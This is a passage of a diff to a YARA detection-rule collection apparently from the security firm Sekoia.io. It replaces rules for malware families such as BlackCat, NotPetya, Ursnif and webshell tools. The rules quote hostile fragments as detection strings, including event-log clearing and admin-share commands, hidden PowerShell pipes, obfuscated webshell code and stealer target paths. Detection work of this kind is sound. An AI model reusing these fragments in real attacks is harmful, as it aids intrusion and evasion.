-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_3.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ef62075c804080c0450f856b768da84a32f20e2f1ce5714e477b3e6f01d60503"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader_vbs.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c91e1ce26c0735e8c68fe39f2fbeda8aed51cd4f9a0b967b5d184843728dcef4"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Function RC4(byteMessage, strKey)"
-		$ = "Sub Run()"
-		$ = "plain = RC4(decoded, "
-		$ = "Dim plain"
+		$ = "b24gZXJyb3IgcmVzd" ascii
+		$ = "BinaryStream.readtext" ascii nocase
+		$ = "createobject(\"msxml2.domdocument.3.0\").createelement(" ascii nocase
+		$ = "Dim cSecond, cMinute, CHour, cDay, cMonth, cYear" ascii nocase
+		$ = "tDate & \"T\" & tTime"
+		$ = "AutoOpen" ascii nocase
 
 	condition:
-		all of them and filesize < 2MB
+		5 of them and filesize < 50KB
 }
-rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
+rule SEKOIA_Tool_Dynamicwrapper_Strings : FILE
 {
 	meta:
-		description = "Detects Saitama backdoor variants"
+		description = "Detects DynamicWrapperX"
 		author = "Sekoia.io"
-		id = "f885551a-d0f0-431d-aa4f-7caa93b1db6a"
-		date = "2022-05-13"
+		id = "bbfad0a8-8b86-47c7-bf70-0a3f6859d64b"
+		date = "2023-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_saitama_backdoor_may2022_2.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "622c386d4b10b81a5c84f9c093d91add04497a707ba88e8395fda8587b5c3791"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_dynamicwrapper_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fad5fec74dc3efdd7fc67ef1c6373957df4ee564f3fe6333b924b236ea7458d9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240831,27 +241617,25 @@ rule SEKOIA_Apt_Oilrig_Saitama_Backdoor_May2022_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "_CorExeMain"
-		$ = "GetAgentID"
-		$ = "ComputeStringHash"
-		$ = ".Agent.pdb"
-		$ = "TaskExecTimeout"
+		$ = "Software\\Classes\\DynamicWrapperX" ascii
+		$ = "DllRegisterServer" ascii
+		$ = "GoLink, GoAsm" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Lnk : FILE
+rule SEKOIA_Backdoor_Powershellempire_Sharpire : FILE
 {
 	meta:
-		description = "Detects lnk file used by Gamaredon"
+		description = "Detect Sharpire version of Empire"
 		author = "Sekoia.io"
-		id = "bfa69d84-433c-4f37-93b7-5b1b11677fbb"
-		date = "2024-02-08"
+		id = "fed21fbd-52ed-4649-a1ff-56eae57fc9ef"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_lnk.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "be73ffca4b88f11e33532cf9a179743508bfa7a60c6f4de98c245b350b5fb910"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_powershellempire_sharpire.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a4da54a16ee1ac3dea3b3b5a5983638ea28fd1e6d580cd48db595f15a92817a1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240859,24 +241643,27 @@ rule SEKOIA_Apt_Gamaredon_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "-windowstyle hidden $(gc " wide
-		$s2 = "|out-string)|powershell -noprofile -" wide
+		$ = "GetAgentID" ascii wide
+		$ = "SetAgentID" ascii wide
+		$ = "StartAgentJob" ascii wide
+		$ = "get_JobThread" ascii wide
+		$ = "GetStagerURI" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and any of them and filesize < 100KB
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 1MB
 }
-rule SEKOIA_Implant_Mac_Smoothoperator_Update_Agent : FILE
+rule SEKOIA_Guerrilla_Lemongroup : FILE
 {
 	meta:
-		description = "UpdateAgent payload delivered by SmoothOperator during the 3CX supply chain attack"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "45a1d0d9-083b-4b4a-b53c-e5d86f804f01"
-		date = "2023-07-04"
+		id = "df635b5a-a19a-48ab-9a3a-9723e265c71d"
+		date = "2023-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_mac_smoothoperator_update_agent.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d5a0d87ac810097983df92ab1b1ff9775093b0aaaf551a74ff6fe5149dbd3a21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guerrilla_lemongroup.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b644cb537a42217f2549f37bfe07ae0b7ba39fc248ab3d5fd870384c7684683b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240884,87 +241671,110 @@ rule SEKOIA_Implant_Mac_Smoothoperator_Update_Agent : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "3CX Desktop App/.main_storage"
-		$ = "3CX Desktop App/config.json"
-		$ = "3cx_auth_token_content=%s"
-		$ = "3cx_auth_id=%s"
+		$dex = { 64 65 78 0A 30 33 ?? 00 }
+		$odex = { 64 65 79 0A 30 33 ?? 00 }
+		$s2 = "data response code===" ascii
+		$s3 = "httpCon:" ascii
+		$s4 = "processName :" ascii
+		$s5 = "startListTasks......" ascii
+		$s6 = "url==" ascii
+		$s7 = "java core run ZYGOTE_PROCESS" ascii
+		$api1 = "/api.php" ascii
+		$api2 = "/event.php" ascii
+		$api3 = "/apiRS.php" ascii
 
 	condition:
-		uint32be( 0 ) == 0xcffaedfe and 2 of them
+		($dex at 0 or $odex at 0 ) and filesize > 100KB and filesize < 5MB and 5 of ( $s* ) and 1 of ( $api* )
 }
-rule SEKOIA_Apt_Uac0154_Malicious_Html_Smuggling : FILE
+rule SEKOIA_Ransomware_Win_Blackcat : FILE
 {
 	meta:
-		description = "UAC-0154 Infection chain"
+		description = "Detect the BlackCat ransomware (Windows version)"
 		author = "Sekoia.io"
-		id = "923d11e5-6332-456d-8aff-ae7fb76193a8"
-		date = "2023-10-02"
+		id = "873355f7-3942-4171-9df7-f524bb6b6903"
+		date = "2022-01-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uac0154_malicious_html_smuggling.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ba37b076ac29edcb9af7792420b527b0d64e7838e0237b39afe98a817eafdf7e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_blackcat.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8a60fd14835f9e8683c3e60a19f23bc00020ccd22e74bffbc8ed19fcb8d0e39a"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
 		classification = "TLP:CLEAR"
+		version = "1.1"
 
 	strings:
-		$ = "Microsoft&reg; HTML Help Workshop 4.1"
-		$ = "var a=['"
-		$ = ")+b('0x"
+		$s1 = "desktop_image::set_desktop_wallpaper=" ascii
+		$s2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" ascii
+		$s3 = "propagate::none" ascii
+		$s4 = "propagate::failed=" ascii
+		$s5 = "propagate::ok=" ascii
+		$s6 = "query_status_process::ok=" ascii
+		$s7 = "enum_dependent_services::ok=" ascii
+		$s8 = "enum_dependent_services::error=" ascii
+		$s9 = "try_stop=" ascii
+		$s10 = "try_stop::ok=" ascii
+		$s11 = "try_stop::failed=" ascii
+		$s12 = "stop=" ascii
+		$s13 = "dependent_service_name=" ascii
+		$s14 = "kill_all=" ascii
+		$s15 = "detach=" ascii
 
 	condition:
-		all of them and filesize < 100KB
+		uint16( 0 ) == 0x5A4D and filesize > 2MB and filesize < 4MB and all of them
 }
-rule SEKOIA_Apt_Globalshadow : FILE
+rule SEKOIA_Tool_Bypassgodzilla : FILE
 {
 	meta:
-		description = "Detects the GLOBALSHADOW malware"
+		description = "Detects payload of BypassGodzilla"
 		author = "Sekoia.io"
-		id = "2fef6192-25a6-4d6a-8e19-53ad51617d90"
-		date = "2024-09-04"
+		id = "fa492f97-a46c-422d-a617-c503744ee22e"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_globalshadow.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "68c16b6f178c88c12c9555169887c321"
-		logic_hash = "034a994be5d5b00fc7d1a43a0cb0b5b576358cea26f3354fd574132560ca0ae3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_bypassgodzilla.yar#L1-L38"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "571c9042c627abba19ba1d591e2083eb"
+		hash = "56cfc5a876f8f55bf184be9f368b6d8a"
+		hash = "d4f7ca537701aee8849c474bc4df19d1"
+		hash = "e4be04331c5f447b3ca03aa637d16c85"
+		hash = "905fa3b692577a086ac654ef89e8b83d"
+		logic_hash = "47e52267c73209c6191910ac21bca44acac2100be96250fd5dda1f889fb03b07"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$command1 = "time to rest" wide
-		$command2 = "pw" wide
-		$command3 = "pr" wide
-		$command4 = "dnld" wide
-		$step1 = "step1-" wide
-		$step2 = "step2-" wide
-		$step3 = "step3-" wide
-		$step4 = "step4-" wide
-		$step5 = "step5-" wide
-		$step6 = "step6-" wide
-		$delim = "]#@#[" wide
+		$jsp_1a = "response.getWriter().write(\""
+		$jsp_1b = "\".substring("
+		$jsp_2a = "response.getWriter().write(java.util.Base64/*"
+		$jsp_2b = "*/.getEncoder()/*"
+		$jsp_2c = ".toByteArray(),true)));"
+		$asp_1 = "[\"payload\"]).CreateInstance(\"LY\");"
+		$asp_2 = "\\U00000045\\U00000071\\U00000075\\U00000061\\U0000006C\\U00000073(Context);"
+		$php_1 = "=(\"!\"^\"@\").'ss'.Chr(\"101\").'rs';"
+		$php_2 = "*/md5/*"
+		$php_3 = "*/isset($_SESSION/*"
+		$php_4 = "@set_time_limit(Chr(\"48\"))"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of ( $command* ) and 3 of ( $step* ) and $delim and true
+		(( all of ( $jsp_* ) and ( @jsp_1b- @jsp_1a < 70 ) and ( @jsp_2b- @jsp_2a < 70 ) and ( @jsp_2c - @jsp_2a < 160 ) ) or ( all of ( $asp_* ) and ( @asp_2 > @asp_1 ) ) or ( all of ( $php_* ) ) ) and filesize < 30KB and true
 }
-rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
+rule SEKOIA_Apt_Konni_Check_Bat : FILE
 {
 	meta:
-		description = "CloudAtlas Shellcode for CVE_2018_0798 "
+		description = "Script used to performs check before executing Konni"
 		author = "Sekoia.io"
-		id = "6c602c66-df40-4436-800f-e548dacc1e81"
-		date = "2022-12-01"
+		id = "f05e6ba2-c128-4c17-8f74-f7640103c859"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_rtf_shellcode_cve_2018_0798.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a8c320ca81ef196b84a8fb08d9e02ef8cfb338024fa7e6776ff6c8c049b8e63c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_konni_check_bat.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "13a9dd6978985eb17960794c6de2ee2e6411e6afeb705ff95ced72bc0efb5d8c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240972,55 +241782,66 @@ rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "6060606061616161616161616161616161616161FB0B00004bE8FFFFFFFFC35F83C71B33C966B908010f0d00ddd8d97424f4668137" ascii nocase
+		$ = ":64BIT"
+		$ = ":32BIT"
+		$ = ":INSTALL"
+		$ = ":EXIT"
+		$ = "netpp.dll"
+		$ = "wpns.dll"
+		$ = "netpp64.dll"
+		$ = "wpns64.dll"
+		$ = "rundll32"
 
 	condition:
-		filesize < 8MB and all of them
+		filesize < 1MB and 7 of them
 }
-rule SEKOIA_Tool_Pivotnacci_Webshell : FILE
+rule SEKOIA_Ursnif_Ldr4
 {
 	meta:
-		description = "Detects pivotnacci webshell"
+		description = "Ursnif LDR4"
 		author = "Sekoia.io"
-		id = "729b6381-b59d-46fe-9ad4-b8b68fb0ceea"
-		date = "2024-04-22"
+		id = "73e63481-8a89-4342-87f0-8dc7ad459396"
+		date = "2024-12-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_pivotnacci_webshell.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a57792915b4c888547ebe0b08b928e4bc32b3526c98a3ccc9fca0193cedee20a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ursnif_ldr4.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6fe237c6370a1b99bddb7bee4170d29cbb780dc445f5d5039201ddbaf05c63db"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "if (cmd == SEND_OPERATION) {"
-		$ = "Response.BinaryWrite(newBuff)"
-		$ = "Request.Headers.Get(ID_HEADER)"
-		$ = "[$READ_BUFFER_SESSION_KEY . $connection_id]"
-		$ = "extract_session_readbuf($conn_id"
-		$ = "Failed connecting to target $addr:$port : $errstr"
-		$ = "void handle_post(String cmd)"
-		$ = "SocketChannel socketChannel = this.get_socket(socket_id"
-		$ = "this.get_svc().compareTo(this.get_hostname())"
+		$str1 = "LOADER.dll" fullword
+		$str2 = "DllRegisterServer" fullword
+		$str3 = ".bss" fullword
+		$x64_code1 = { 3D 2E 62 73 73 74 0A 48 83 C7 28 }
+		$x64_code2 = { 8B 17 48 83 C7 04 8B CA 8b C2 23 CB 0B C3 F7 D1 23 C8 41 2B CA 44 8B D2 41 89 08 41 8B CB 49 83 C0 04 83 E1 07 FF C1 41 D3 C2 41 83 EB 04 79 }
+		$x64_code3 = { 41 0F B6 01 49 FF C1 8B C8 8B D0 83 E1 03 C1 E1 03 D3 E2 44 03 C2 41 83 C2 FF 75 }
+		$x64_code4 = { 45 8D 45 08 48 8D 8C 24 [4] BA 30 00 FE 7F E8 }
+		$x64_code5 = { 48 8D 8C 24 [4] BA 30 00 FE 7F 41 B8 08 00 00 00 E8 }
+		$x86_code1 = { 81 F9 2E 62 73 73 74 09 83 C6 28 }
+		$x86_code2 = { 8B 06 8B D0 23 55 0C 8B D8 0B 5D 0C F7 D2 23 D3 2B D1 8A 4D 08 80 E1 07 83 C6 04 89 17 83 C7 04 FE C1 D3 C0 83 6D 08 04 8B C8 79 }
+		$x86_code3 = { 8A 0E 0F B6 D1 8B CA 83 E1 03 C1 E1 03 D3 E2 46 03 C2 4F 75 }
+		$x86_code4 = { 6A 08 8D 45 F8 68 30 00 FE 7F 50 E8 }
 
 	condition:
-		3 of them and filesize < 10KB
+		true and 5 of them
 }
-rule SEKOIA_Infostealer_Win_Titan : FILE
+rule SEKOIA_Apt_Apt_K_47_Walkershell : FILE
 {
 	meta:
-		description = "Finds samples of the Titan Stealer"
+		description = "Detects WalkerShell used by APT-K-47"
 		author = "Sekoia.io"
-		id = "0adbe616-0d91-4b05-b7a8-812cd79f9252"
-		date = "2023-01-12"
+		id = "201f8415-32d4-4af1-ba80-734554ced728"
+		date = "2024-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_titan.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "996dc320c83f57c47afe50ad032bac43ad1fbfbbd5a86e517089a062b0382993"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt_k_47_walkershell.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0dffd8e4d6c244a4faea0f8b8cda1e544a732ad9982e7963b21d5f71080f8f5d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241028,34 +241849,43 @@ rule SEKOIA_Infostealer_Win_Titan : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "/sendlog" ascii
-		$str1 = "/stealer/grabfiles.go" ascii
-		$str2 = "/stealer/installedsoft.go" ascii
-		$str3 = "/stealer/screenshot.go" ascii
-		$str4 = "/stealer/sendlog.go" ascii
-		$str5 = "/stealer/userinformation.go" ascii
-		$str6 = "C:/Program Files (x86)/Steam/config/" ascii
-		$str7 = "/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/" ascii
-		$str8 = "MAC Adresses:" ascii
-		$str9 = "/Coowon/Coowon/" ascii
-		$str10 = "_/C_/Users/admin/Desktop/stealer_v7/stealer" ascii
+		$s1 = "\\n kuskure" ascii wide
+		$s2 = "col.log.txt" ascii wide
+		$s3 = "polor" ascii wide
+		$s4 = "emit" ascii wide
+		$s5 = "delta" ascii wide
+		$s6 = "under process" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
 }
-rule SEKOIA_Tool_Advancedrun_Strings : FILE
+rule SEKOIA_Rootkit_Diamorphine_Strings : FILE
 {
 	meta:
-		description = "Detects AdvancedRun strings"
+		description = "Detects Diamorphine linux rootkit based on strings"
 		author = "Sekoia.io"
-		id = "842a996e-0cf2-485f-9d3c-ccbd40c9ab6c"
-		date = "2024-09-06"
+		id = "5a28be5c-9a57-4204-a7cc-42dfcaa2c2da"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_advancedrun_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "a1d50ebe6124584f32de0625475cdb74"
-		logic_hash = "58e5e0c903057ff382a78a37ba289cbaa5949d99a4b5ff77a223e86aab591f5d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rootkit_diamorphine_strings.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "622675e83bab630adc0f1c6c46c4d6d1"
+		hash = "013b23213975d2646e2435f058afcacf"
+		hash = "f068e83721f10ad74bb6f386a4375a91"
+		hash = "ba9d6a6bbde602fd414cea09fcbd1aa0"
+		hash = "fdd86788e295010c4e61bf6b589f340e"
+		hash = "0d396c1763503b35a7f601831bd684de"
+		hash = "66b8955188a3bda7ecdcd51cfd360313"
+		hash = "1e4fd8c6bf0e381ac395d9bff1f98a31"
+		hash = "ce08ce2b8bc1718052f5d0316e3e71b7"
+		hash = "94982037875d4fdb17681866afc12ade"
+		hash = "4fa2fe9ccde3e6bd4956e2b93ca5fcb6"
+		hash = "644c4ce0bbe4f1f1e3aae537a111d5b8"
+		hash = "fb7d594621fbb4f9bdb0eb74f6090ecd"
+		hash = "9faf1493164e734f533f0ecfb1737a98"
+		hash = "33d48b6c66715ab67a059ab940d759ff"
+		logic_hash = "70e2e9155181a717f1c2483a748d5991488f0ba7371a2b3c9cfada2ecc5812f9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241063,139 +241893,82 @@ rule SEKOIA_Tool_Advancedrun_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "nirsoft.net" wide
-		$ = "Another logged-in user" wide
-		$ = "Choose config file to save" wide
-		$ = "AdvancedRun" ascii wide
+		$ = "LKM rootkit" ascii fullword
+		$ = "m0nad"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
+		uint32be( 0 ) == 0x7f454c46 and all of them
 }
-
-rule SEKOIA_Apt_Lazarus_Gopuram_Backdoor : FILE
+rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
 {
 	meta:
-		description = "Detects Gopuram Backdoor"
+		description = "Detects NotPetya worm"
 		author = "Sekoia.io"
-		id = "947d4ee3-79fa-450b-8482-beafe607baae"
-		date = "2023-04-04"
+		id = "c6021638-1b59-4d20-a29d-95cabf256a28"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_gopuram_backdoor.yar#L3-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c019b65d28a7b0edf408a1a159a7535e7e14593bbd42c8df3201108ed02f96c0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_notpetya_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5600071de4b4022a71c48fbcd4b5e47ff6dfa291cc5eac65720bbf763068a6e3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
-		hash2 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
 
 	strings:
-		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-ms"
-		$xop = {D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE}
-		$opa1 = {48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 ??}
-		$opa2 = {48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ??}
+		$ = "wevtutil cl Security &" wide
+		$ = "wevtutil cl System &" wide
+		$ = "u%s \\%s -accepteula -s" wide
+		$ = "\\\\%ws\\admin$\\%ws" wide
+		$ = "\\\\%s\\admin$" wide
+		$ = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1" wide
 
 	condition:
-		( uint16( 0 ) == 0x4d5a and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Sandworm_Caddywiper_Stacked_Strings : FILE
+rule SEKOIA_Apt_Sandworm_Powergap_Apr2022 : FILE
 {
 	meta:
-		description = "Detects stacked strings used in the wiper."
+		description = "Detects the POWERGAP malware"
 		author = "Sekoia.io"
-		id = "7750c4b6-5781-4b1c-8200-cbce9f18aa56"
-		date = "2022-04-06"
+		id = "2a1c7f02-92b3-45b8-a710-253b1a28fe85"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sandworm_caddywiper_stacked_strings.yar#L1-L74"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e8c94e8611a50080368785d2b341a95d5359d1d814e1d665553324118700ed10"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sandworm_powergap_apr2022.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f1532cce42ab1315d3ab7882fa43ad05255055da720a123bed034242d439da2a"
 		score = 75
-		quality = 80
+		quality = 68
 		tags = "FILE"
-		version = "2.0"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { C6 45 ?? 6E
-        C6 45 ?? 65
-        C6 45 ?? 74
-        C6 45 ?? 61
-        C6 45 ?? 70
-        C6 45 ?? 69
-        C6 45 ?? 33
-        C6 45 ?? 32
-        C6 45 ?? 2E
-        C6 45 ?? 64
-        C6 45 ?? 6C
-        C6 45 ?? 6C }
-		$ = {  C6 45 ?? 44
-        C6 45 ?? 65
-        C6 45 ?? 76
-        C6 45 ?? 69
-        C6 45 ?? 63
-        C6 45 ?? 65
-        C6 45 ?? 49
-        C6 45 ?? 6F
-        C6 45 ?? 43
-        C6 45 ?? 6F
-        C6 45 ?? 6E
